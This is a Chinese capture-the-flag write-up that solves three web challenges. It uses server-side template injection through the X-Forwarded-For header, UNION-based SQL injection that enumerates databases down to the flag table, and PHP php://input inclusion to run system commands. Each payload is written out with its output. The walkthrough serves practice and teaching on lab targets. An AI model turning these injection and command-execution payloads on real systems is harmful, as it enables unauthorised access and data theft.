微信公众号搜"智元新知"关注
微信扫一扫可直接关注哦!

1.21

[BJDCTF2020]The mystery of ip

首先打开题目

 

有三个页面一个index.PHP一个flag.PHP一个hint.PHP

只有第二个flag.PHP页面有ip

 

然后ip就想到了X-Forwarded-For

于是直接用hackbar改x-forwarded-for

首先改成1试试

回显

Your IP is : 1 

然后改成1+1

回显

Your IP is : 1+1

然后改成{{1+1}}

结果回显

Your IP is : 2 

很明显是ssti服务器模板注入题目

直接payload:

X-Forwarded-For: {{system('ls /')}}

回显

Your IP is : bin dev etc flag home lib media mnt opt proc root run sbin srv sys tmp usr var var 

说明ssti注入成功了,于是直接payload:

X-Forwarded-For: {{system('cat /flag')}}
Your IP is : flag{6a448c30-c2d5-4f57-9871-99a146e2d4a7}

 

 

CTFshowweb2

 

首先直接用户名admin然后密码采用' or 1=1#进行sql注入。

回显

 

说明注入成功了,存在sql漏洞

于是直接采用联合查询(因为这里是post方式提交,所以采用bp抓包进行修改传参)

payload:' union select 1,group_concat(schema_name),3 from @R_118_4045@ion_schema.schemata#

爆出库的名字

@R_118_4045@ion_schema,test,ctftraining,MysqL,performance_schema,web2

然后再爆出表的名字:

payload:' union select 1,group_concat(table_name),3 from @R_118_4045@ion_schema.tables where table_schema like 'web2'#

然后得到:

flag,user

然后再爆出列的名字:

payload:' union select 1,group_concat(column_name),3 from @R_118_4045@ion_schema.columns where table_name like 'flag'#

然后回显:

flag

然后可以payload:

payload:' union select 1,group_concat(flag),3 from web2.flag#

然后得到:ctfshow{51201966-2b6a-46be-9c65-eb6f63bb9435}

 

CTFshowweb3

 

首先打开题目只有这样一个,题目提示是说PHP伪协议

然后我先

payload:?url=PHP://filter/convert.base64-encode/resource=index.PHP

然后经过解码得到

<?PHP
error_reporting(0);
$url=$_GET['url'];
if(isset($url)){
  include($url);
}
   
?>
<?PHP
           
          $code="<?PHP include($"."_GET['url']);?>";
          highlight_string($code);
?>

然后并没有什么用处,然后我尝试采用:

payload:?url=PHP://input
并且同时post提交一个<?PHP system('ls');?>

然后得到了

ctf_go_go_go index.PHP 

于是然后提交一个<?PHP system('cat ctf_go_go_go');?>

得到了最终答案 ctfshow{9bb7e56e-4785-4ffe-91b9-a05e75014117}

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 [email protected] 举报,一经查实,本站将立刻删除。

相关推荐